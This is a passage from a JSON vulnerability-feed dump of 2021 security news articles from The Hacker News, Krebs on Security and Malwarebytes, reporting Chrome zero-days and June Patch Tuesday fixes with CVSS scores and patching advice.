V8\n * [CVE-2021-30554](<https://thehackernews.com/2021/06/update-your-chrome-browser-to-patch-yet.html>) \\- Use-after-free in WebGL\n * [CVE-2021-30563](<https://thehackernews.com/2021/07/update-your-chrome-browser-to-patch-new.html>) \\- Type confusion in V8\n * 
[CVE-2021-30632](<https://thehackernews.com/2021/09/update-google-chrome-to-patch-2-new.html>) \\- Out of bounds write in V8\n * [CVE-2021-30633](<https://thehackernews.com/2021/09/update-google-chrome-to-patch-2-new.html>) \\- Use-after-free in Indexed DB API\n\nChrome users are advised to update to the latest version (94.0.4606.61) for Windows, Mac, and Linux by heading to Settings > Help > 'About Google Chrome' to mitigate the risk associated with the flaw.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2021-09-25T06:39:00", "type": "thn", "title": "Urgent Chrome Update Released to Patch Actively Exploited Zero-Day Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-30551", "CVE-2021-30554", 
"CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-30869", "CVE-2021-37973"], "modified": "2021-09-27T04:38:24", "id": "THN:6A9CD6F085628D08978727C0FF597535", "href": "https://thehackernews.com/2021/09/urgent-chrome-update-released-to-patch.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:14", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEggQTDQ-V9WbcSJKwsXKGeYWFxP3jSKikqYhYG8xpFa_NiB7aFJV8tcR11eRFpoq9nIOMlHfbefT2pZC9vdUHCul3SAafHr4t5T-oIIj-H61WEAlv8x9Mfzo1cqzuxor4bqF090P_C7w7fQqzoSFEmUVm1PvbmzU9YENMC2O_ZAEkOC_qbBbzYZdzhA>)\n\nGoogle on Thursday pushed urgent security fixes for its Chrome browser, including a pair of new security weaknesses that the company said are being exploited in the wild, making them the fourth and fifth actively zero-days plugged this month alone.\n\nThe issues, designated as [CVE-2021-37975 and CVE-2021-37976](<https://chromereleases.googleblog.com/2021/09/stable-channel-update-for-desktop_30.html>), are part of a total of four patches, and concern a [use-after-free flaw](<https://cwe.mitre.org/data/definitions/416.html>) in V8 JavaScript and WebAssembly engine as well as an information leak in core.\n\nAs is usually the case, the tech giant has refrained from sharing any additional details regarding how these zero-day vulnerabilities were used in attacks so as to allow a majority of users to be updated with the patches, but noted that it's aware that \"exploits for CVE-2021-37975 and CVE-2021-37976 exist in the wild.\"\n\nAn anonymous researcher has been credited with reporting CVE-2021-37975. 
The discovery of CVE-2021-37976, on the other hand, involves Cl\u00e9ment Lecigne from Google Threat Analysis Group, who was also credited with [CVE-2021-37973](<https://thehackernews.com/2021/09/urgent-chrome-update-released-to-patch.html>), another actively exploited use-after-free vulnerability in Chrome's Portals API that was reported last week, raising the possibility that the two flaws may have been stringed together as part of an exploit chain to execute arbitrary code.\n\nWith the latest update, Google has addressed a record 14 zero-days in the web browser since the start of the year.\n\n * [CVE-2021-21148](<https://thehackernews.com/2021/02/new-chrome-browser-0-day-under-active.html>) \\- Heap buffer overflow in V8\n * [CVE-2021-21166](<https://thehackernews.com/2021/03/new-chrome-0-day-bug-under-active.html>) \\- Object recycle issue in audio\n * [CVE-2021-21193](<https://thehackernews.com/2021/03/another-google-chrome-0-day-bug-found.html>) \\- Use-after-free in Blink\n * [CVE-2021-21206](<https://thehackernews.com/2021/04/2-new-chrome-0-days-under-attack-update.html>) \\- Use-after-free in Blink\n * [CVE-2021-21220](<https://thehackernews.com/2021/04/2-new-chrome-0-days-under-attack-update.html>) \\- Insufficient validation of untrusted input in V8 for x86_64\n * [CVE-2021-21224](<https://thehackernews.com/2021/04/update-your-chrome-browser-immediately.html>) \\- Type confusion in V8\n * [CVE-2021-30551](<https://thehackernews.com/2021/06/new-chrome-0-day-bug-under-active.html>) \\- Type confusion in V8\n * [CVE-2021-30554](<https://thehackernews.com/2021/06/update-your-chrome-browser-to-patch-yet.html>) \\- Use-after-free in WebGL\n * [CVE-2021-30563](<https://thehackernews.com/2021/07/update-your-chrome-browser-to-patch-new.html>) \\- Type confusion in V8\n * [CVE-2021-30632](<https://thehackernews.com/2021/09/update-google-chrome-to-patch-2-new.html>) \\- Out of bounds write in V8\n * 
[CVE-2021-30633](<https://thehackernews.com/2021/09/update-google-chrome-to-patch-2-new.html>) \\- Use-after-free in Indexed DB API\n * [CVE-2021-37973](<https://thehackernews.com/2021/09/urgent-chrome-update-released-to-patch.html>) \\- Use-after-free in Portals\n\nChrome users are advised to update to the latest version (94.0.4606.71) for Windows, Mac, and Linux by heading to Settings > Help > 'About Google Chrome' to mitigate any potential risk of active exploitation.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2021-10-01T03:30:00", "type": "thn", "title": "Update Google Chrome ASAP to Patch 2 New Actively Exploited Zero-Day Flaws", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-30551", "CVE-2021-30554", 
"CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-37973", "CVE-2021-37975", "CVE-2021-37976"], "modified": "2021-10-05T05:27:09", "id": "THN:50D7C51FE6D69FC5DB5B37402AD0E412", "href": "https://thehackernews.com/2021/09/update-google-chrome-asap-to-patch-2.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:38:09", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEgMs77BPvPvj6P-3E7i08R8I_ixvGQZgvS5p1CxbhBqiARNzNLx3R6X1fYdCRjiQmZfLY3-6HUY_hPXAucE_jFVypFTV0HG0XIru72uSOfwfn3mMcLC9j6XyeOCF7We4fYjthQ17-YmGUSvhPWEOlnBXakT_9U8IYdpMKEB6GeCFMJI8ihho5D-6JUO>)\n\nGoogle on Thursday rolled out an emergency update for its Chrome web browser, including fixes for two zero-day vulnerabilities that it says are being actively exploited in the wild.\n\nTracked as **CVE-2021-38000** and **CVE-2021-38003**, the weaknesses relate to insufficient validation of untrusted input in a feature called Intents as well as a case of inappropriate implementation in V8 JavaScript and WebAssembly engine. The internet giant's Threat Analysis Group (TAG) has been credited with discovering and reporting the two flaws on September 15, 2021, and October 26, 2021, respectively.\n\n\"Google is aware that exploits for CVE-2021-38000 and CVE-2021-38003 exist in the wild,\" the company [noted](<https://chromereleases.googleblog.com/2021/10/stable-channel-update-for-desktop_28.html>) in an advisory without delving into technical specifics about how the two vulnerabilities were used in attacks or the threat actors that may have weaponized them.\n\nAlso addressed as part of this stable channel update is a [use-after-free](<https://cwe.mitre.org/data/definitions/416.html>) vulnerability in the Web Transport component (CVE-2021-38002), which was demonstrated for the first time at the [Tianfu Cup](<https://thehackernews.com/2021/10/windows-10-linux-ios-chrome-and-many.html>) contest held earlier this month in China. 
With these patches, Google has resolved a record 16 zero-days in the web browser since the start of the year \u2014\n\n * [**CVE-2021-21148**](<https://thehackernews.com/2021/02/new-chrome-browser-0-day-under-active.html>) \\- Heap buffer overflow in V8\n * [**CVE-2021-21166**](<https://thehackernews.com/2021/03/new-chrome-0-day-bug-under-active.html>) \\- Object recycle issue in audio\n * [**CVE-2021-21193**](<https://thehackernews.com/2021/03/another-google-chrome-0-day-bug-found.html>) \\- Use-after-free in Blink\n * [**CVE-2021-21206**](<https://thehackernews.com/2021/04/2-new-chrome-0-days-under-attack-update.html>) \\- Use-after-free in Blink\n * [**CVE-2021-21220**](<https://thehackernews.com/2021/04/2-new-chrome-0-days-under-attack-update.html>) \\- Insufficient validation of untrusted input in V8 for x86_64\n * [**CVE-2021-21224**](<https://thehackernews.com/2021/04/update-your-chrome-browser-immediately.html>) \\- Type confusion in V8\n * [**CVE-2021-30551**](<https://thehackernews.com/2021/06/new-chrome-0-day-bug-under-active.html>) \\- Type confusion in V8\n * [**CVE-2021-30554**](<https://thehackernews.com/2021/06/update-your-chrome-browser-to-patch-yet.html>) \\- Use-after-free in WebGL\n * [**CVE-2021-30563**](<https://thehackernews.com/2021/07/update-your-chrome-browser-to-patch-new.html>) \\- Type confusion in V8\n * [**CVE-2021-30632**](<https://thehackernews.com/2021/09/update-google-chrome-to-patch-2-new.html>) \\- Out of bounds write in V8\n * [**CVE-2021-30633**](<https://thehackernews.com/2021/09/update-google-chrome-to-patch-2-new.html>) \\- Use-after-free in Indexed DB API\n * [**CVE-2021-37973**](<https://thehackernews.com/2021/09/urgent-chrome-update-released-to-patch.html>) \\- Use-after-free in Portals\n * [**CVE-2021-37975**](<https://thehackernews.com/2021/09/update-google-chrome-asap-to-patch-2.html>) \\- Use-after-free in V8\n * [**CVE-2021-37976**](<https://thehackernews.com/2021/09/update-google-chrome-asap-to-patch-2.html>) \\- 
Information leak in core\n\nChrome users are advised to update to the latest version (95.0.4638.69) for Windows, Mac, and Linux by heading to Settings > Help > 'About Google Chrome' to mitigate any potential risk of active exploitation.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2021-10-29T04:08:00", "type": "thn", "title": "Google Releases Urgent Chrome Update to Patch 2 Actively Exploited 0-Day Bugs", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-37973", "CVE-2021-37975", "CVE-2021-37976", "CVE-2021-38000", "CVE-2021-38002", "CVE-2021-38003"], "modified": "2021-10-29T04:08:52", "id": 
"THN:B7217784F9D53002315C9C43CCC73766", "href": "https://thehackernews.com/2021/10/google-releases-urgent-chrome-update-to.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:48", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEibt_uA0VwMgumOtohRzrBSD-Inv5dv71ZMU1Hu4XYJFQxp8FVjEZzeLUuvttUyYx1xMxQJ16Nfw5Jdc7mPLfwoGoTeZqrLRMZ005Eu673XGL_uJrq7LDUpWojmmmN1YHSwVQcJQzL28acTco05Z7auS001HlgSR96GjvrE5gDr2M123luTRVFTFcAT>)\n\nGoogle has rolled out fixes for five security vulnerabilities in its Chrome web browser, including one which it says is being exploited in the wild, making it the [17th such weakness](<https://thehackernews.com/2021/10/google-releases-urgent-chrome-update-to.html>) to be disclosed since the start of the year.\n\nTracked as [CVE-2021-4102](<https://chromereleases.googleblog.com/2021/12/stable-channel-update-for-desktop_13.html>), the flaw relates to a [use-after-free bug](<https://cwe.mitre.org/data/definitions/416.html>) in the V8 JavaScript and WebAssembly engine, which could have severe consequences ranging from corruption of valid data to the execution of arbitrary code. 
An anonymous researcher has been credited with discovering and reporting the flaw.\n\nAs it stands, it's not known how the weakness is being abused in real-world attacks, but the internet giant issued a terse statement that said, \"it's aware of reports that an exploit for CVE-2021-4102 exists in the wild.\" This is done in an attempt to ensure that a majority of users are updated with a fix and prevent further exploitation by other threat actors.\n\nCVE-2021-4102 is the second use-after-free vulnerability in V8 the company has remediated in less than three months following reports of active exploitation, with the previous vulnerability [CVE-2021-37975](<https://thehackernews.com/2021/09/update-google-chrome-asap-to-patch-2.html>), also reported by an anonymous researcher, plugged in an update it shipped on September 30. It's not immediately clear if the two flaws bear any relation to one another.\n\nWith this latest update, Google has addressed a record 17 zero-days in Chrome this year alone \u2014\n\n * [CVE-2021-21148](<https://thehackernews.com/2021/02/new-chrome-browser-0-day-under-active.html>) \\- Heap buffer overflow in V8\n * [CVE-2021-21166](<https://thehackernews.com/2021/03/new-chrome-0-day-bug-under-active.html>) \\- Object recycle issue in audio\n * [CVE-2021-21193](<https://thehackernews.com/2021/03/another-google-chrome-0-day-bug-found.html>) \\- Use-after-free in Blink\n * [CVE-2021-21206](<https://thehackernews.com/2021/04/2-new-chrome-0-days-under-attack-update.html>) \\- Use-after-free in Blink\n * [CVE-2021-21220](<https://thehackernews.com/2021/04/2-new-chrome-0-days-under-attack-update.html>) \\- Insufficient validation of untrusted input in V8 for x86_64\n * [CVE-2021-21224](<https://thehackernews.com/2021/04/update-your-chrome-browser-immediately.html>) \\- Type confusion in V8\n * [CVE-2021-30551](<https://thehackernews.com/2021/06/new-chrome-0-day-bug-under-active.html>) \\- Type confusion in V8\n * 
[CVE-2021-30554](<https://thehackernews.com/2021/06/update-your-chrome-browser-to-patch-yet.html>) \\- Use-after-free in WebGL\n * [CVE-2021-30563](<https://thehackernews.com/2021/07/update-your-chrome-browser-to-patch-new.html>) \\- Type confusion in V8\n * [CVE-2021-30632](<https://thehackernews.com/2021/09/update-google-chrome-to-patch-2-new.html>) \\- Out of bounds write in V8\n * [CVE-2021-30633](<https://thehackernews.com/2021/09/update-google-chrome-to-patch-2-new.html>) \\- Use-after-free in Indexed DB API\n * [CVE-2021-37973](<https://thehackernews.com/2021/09/urgent-chrome-update-released-to-patch.html>) \\- Use-after-free in Portals \n * [CVE-2021-37975](<https://thehackernews.com/2021/09/update-google-chrome-asap-to-patch-2.html>) \\- Use-after-free in V8\n * [CVE-2021-37976](<https://thehackernews.com/2021/09/update-google-chrome-asap-to-patch-2.html>) \\- Information leak in core\n * [CVE-2021-38000](<https://thehackernews.com/2021/10/google-releases-urgent-chrome-update-to.html>) \\- Insufficient validation of untrusted input in Intents\n * [CVE-2021-38003](<https://thehackernews.com/2021/10/google-releases-urgent-chrome-update-to.html>) \\- Inappropriate implementation in V8\n\nChrome users are recommended to update to the latest version (96.0.4664.110) for Windows, Mac, and Linux by heading to Settings > Help > 'About Google Chrome' to mitigate any potential risk of active exploitation.\n\n \n\n\nFound this article interesting? 
Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2021-12-14T04:13:00", "type": "thn", "title": "Update Google Chrome to Patch New Zero-Day Exploit Detected in the Wild", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-37973", "CVE-2021-37975", "CVE-2021-37976", "CVE-2021-38000", "CVE-2021-38003", "CVE-2021-4102"], "modified": "2021-12-14T04:30:59", "id": "THN:4CC79A3CEFEDEB0DC9CF87C5B9035209", "href": "https://thehackernews.com/2021/12/update-google-chrome-to-patch-new-zero.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "krebs": [{"lastseen": "2021-06-15T08:32:06", "description": "**Microsoft** today released another round of security 
updates for **Windows** operating systems and supported software, _including fixes for six zero-day bugs that malicious hackers already are exploiting in active attacks._\n\n\n\nJune's Patch Tuesday addresses just 49 security holes -- about half the normal number of vulnerabilities lately. But what this month lacks in volume it makes up for in urgency: Microsoft warns that bad guys are leveraging a half-dozen of those weaknesses to break into computers in targeted attacks.\n\nAmong the zero-days are:\n\n- [CVE-2021-33742](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-33742>), a remote code execution bug in a Windows HTML component.\n- [CVE-2021-31955](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31955>), an information disclosure bug in the Windows Kernel\n- [CVE-2021-31956](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31956>), an elevation of privilege flaw in Windows NTFS\n- [CVE-2021-33739](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-33739>), an elevation of privilege flaw in the Microsoft Desktop Window Manager\n- [CVE-2021-31201](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31201>), an elevation of privilege flaw in the Microsoft Enhanced Cryptographic Provider\n- [CVE-2021-31199](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31199>), an elevation of privilege flaw in the Microsoft Enhanced Cryptographic Provider\n\n**Kevin Breen**, director of cyber threat research at **Immersive Labs**, said elevation of privilege flaws are just as valuable to attackers as remote code execution bugs: Once the attacker has gained an initial foothold, he can move laterally across the network and uncover further ways to escalate to system or domain-level access.\n\n"This can be hugely damaging in the event of ransomware attacks, where high privileges can enable the attackers to stop or destroy backups and other security tools," 
Breen said. "The 'exploit detected' tag means attackers are actively using them, so for me, it\u2019s the most important piece of information we need to prioritize the patches."\n\nMicrosoft also patched five critical bugs -- flaws that can be remotely exploited to seize control over the targeted Windows computer without any help from users. [CVE-2021-31959](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31959>) affects everything from **Windows 7** through **Windows 10** and **Server** versions **2008**, **2012**, **2016** and **2019**.\n\n**SharePoint** also got a critical update in [CVE-2021-31963](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31963>); Microsoft says this one is less likely to be exploited, but then critical SharePoint flaws are a favorite target of ransomware criminals.\n\nInterestingly, two of the Windows zero-day flaws -- CVE-2021-31201 and CVE-2021-31199 -- are related to a patch **Adobe** released recently for [CVE-2021-28550](<https://helpx.adobe.com/security/products/acrobat/apsb21-29.html>), a flaw in **Adobe Acrobat** and **Reader** that also is being actively exploited.\n\n"Attackers have been seen exploiting these vulnerabilities by sending victims specially crafted PDFs, often attached in a phishing email, that when opened on the victim's machine, the attacker is able to gain arbitrary code execution," said **Christopher Hass**, director of information security and research at **Automox**. "There are no workarounds for these vulnerabilities, patching as soon as possible is highly recommended."\n\nIn addition to updating Acrobat and Reader, Adobe patched flaws in a slew of other products today, including **Adobe Connect**, **Photoshop**, and **Creative Cloud**. 
The full list is [here](<https://helpx.adobe.com/security.html>), with links to updates.\n\nThe usual disclaimer:\n\nBefore you update with this month\u2019s patch batch, please make sure you have backed up your system and/or important files. It\u2019s not uncommon for Windows updates to hose one\u2019s system or prevent it from booting properly, and some updates even have been known to erase or corrupt files.\n\nSo do yourself a favor and back up _before_ installing any patches. Windows 10 even has [some built-in tools](<https://lifehacker.com/how-to-back-up-your-computer-automatically-with-windows-1762867473>) to help you do that, either on a per-file/folder basis or by making a complete and bootable copy of your hard drive all at once.\n\nAnd if you wish to ensure Windows has been set to pause updating so you can back up your files and/or system before the operating system decides to reboot and install patches on its own schedule, see [this guide](<https://www.computerworld.com/article/3543189/check-to-make-sure-you-have-windows-updates-paused.html>).\n\nAs always, if you experience glitches or problems installing any of these patches this month, please consider leaving a comment about it below; there\u2019s a better-than-even chance other readers have experienced the same and may chime in here with some helpful tips.\n\nFor a quick visual breakdown of each update released today and its severity level, check out [this Patch Tuesday post](<https://isc.sans.edu/forums/diary/Microsoft+June+2021+Patch+Tuesday/27506/>) from the **SANS Internet Storm Center**.", "edition": 2, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": 
"3.1"}, "impactScore": 5.9}, "published": "2021-06-08T20:53:28", "type": "krebs", "title": "Microsoft Patches Six Zero-Day Security Holes", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28550", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31959", "CVE-2021-31963", "CVE-2021-33739", "CVE-2021-33742"], "modified": "2021-06-08T20:53:28", "id": "KREBS:E374075CAB55D7AB06EBD73CB87D33CD", "href": "https://krebsonsecurity.com/2021/06/microsoft-patches-six-zero-day-security-holes/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "malwarebytes": [{"lastseen": "2021-06-15T08:32:16", "description": "This Patch Tuesday harvest was another big one. The Windows updates alone included seven zero-day vulnerability updates: two of them are actively being used in the wild by a group called PuzzleMaker, four others have also been seen in the wild, plus one other zero-day vulnerability not known to have been actively exploited. Add to that 45 vulnerabilities that were labelled important, and security updates for Android, Adobe, SAP, and Cisco. 
You can practically see the IT staff scrambling to figure out what to do first and what needs to be checked before applying the patches.\n\n### PuzzleMaker\n\nSecurity researchers have discovered a new threat actor dubbed [PuzzleMaker](<https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/>), that was found using a chain of Google Chrome and Windows 10 zero-day exploits in highly targeted attacks against multiple companies worldwide. Unfortunately the researchers were unable to conclusively identify the Chrome vulnerability that was used (but they do have a suspect). The good news is that the two Windows vulnerabilities in the attack chain were included in the Windows 10 KB5003637 & KB5003635 cumulative updates. These vulnerabilities are listed as [CVE-2021-31955](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31955>), a Windows kernel information disclosure vulnerability, and [CVE-2021-31956](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31956>), a Windows NTFS elevation of privilege vulnerability.\n\n### Other critical issues\n\nThe other critical patches made available by Microsoft this June include these actively exploited vulnerabilities:\n\n * [CVE-2021-33739](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-33739>), a Microsoft DWM Core Library Elevation of Privilege Vulnerability.\n * [CVE-2021-33742](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-33742>) Windows MSHTML Platform Remote Code Execution Vulnerability.\n * [CVE-2021-31199](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31199>) Microsoft Enhanced Cryptographic Provider Elevation of Privilege Vulnerability.\n * [CVE-2021-31201](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31201>) another Microsoft Enhanced Cryptographic Provider Elevation of Privilege Vulnerability.\n\nNot (yet) actively exploited zero day vulnerability:\n\n * 
[CVE-2021-31968](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31968>) Windows Remote Desktop Services Denial of Service Vulnerability.\n\nOther critical updates:\n\n * [CVE-2021-31963](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31963>) Microsoft SharePoint Server Remote Code Execution Vulnerability.\n * [CVE-2021-31959](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31959>) Scripting Engine Memory Corruption Vulnerability.\n * [CVE-2021-31967](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31967>) VP9 Video Extensions Remote Code Execution Vulnerability.\n * [CVE-2021-31985](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31985>) Microsoft Defender Remote Code Execution Vulnerability.\n * [CVE-2021-33742](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-33742>) Windows MSHTML Platform Remote Code Execution Vulnerability.\n\n### Android\n\nThe [Android Security Bulletin of June 7](<https://source.android.com/security/bulletin/2021-06-01>) mentions a critical security vulnerability in the System component that "could enable a remote attacker using a specially crafted transmission to execute arbitrary code within the context of a privileged process", which is as bad as it sounds. That vulnerability, listed as [CVE-2021-0507](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-0507>), could allow an attacker to take control of a targeted Android device unless it's patched.\n\n### Cisco\n\nCisco has issued a [patch](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ftd-ssl-decrypt-dos-DdyLuK6c>) for a vulnerability in the software-based SSL/TLS message handler of Cisco Firepower Threat Defense (FTD) Software, that could allow an unauthenticated, remote attacker to trigger a reload of an affected device, resulting in a denial of service (DoS) condition. 
An attacker could exploit this vulnerability by sending a crafted SSL/TLS message **through** an affected device. SSL/TLS messages sent **to** an affected device do not trigger this vulnerability. Cisco informs us that there is no workaround for this issue. Patching is the only solution.\n\n### SAP\n\nIn the SAP advisory for [Security Patch Day \u2013 June 2021](<https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=578125999>) we can find two issues that are labelled as \u201cHot News\u201d:\n\n * [CVE-2021-27602](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27602>) SAP Commerce, versions - 1808, 1811, 1905, 2005, 2011, Backoffice application allows certain authorized users to create source rules which are translated to drools rule when published to certain modules within the application. An attacker with this authorization can inject malicious code in the source rules and perform remote code execution enabling them to compromise the confidentiality, integrity and availability of the application.\n * 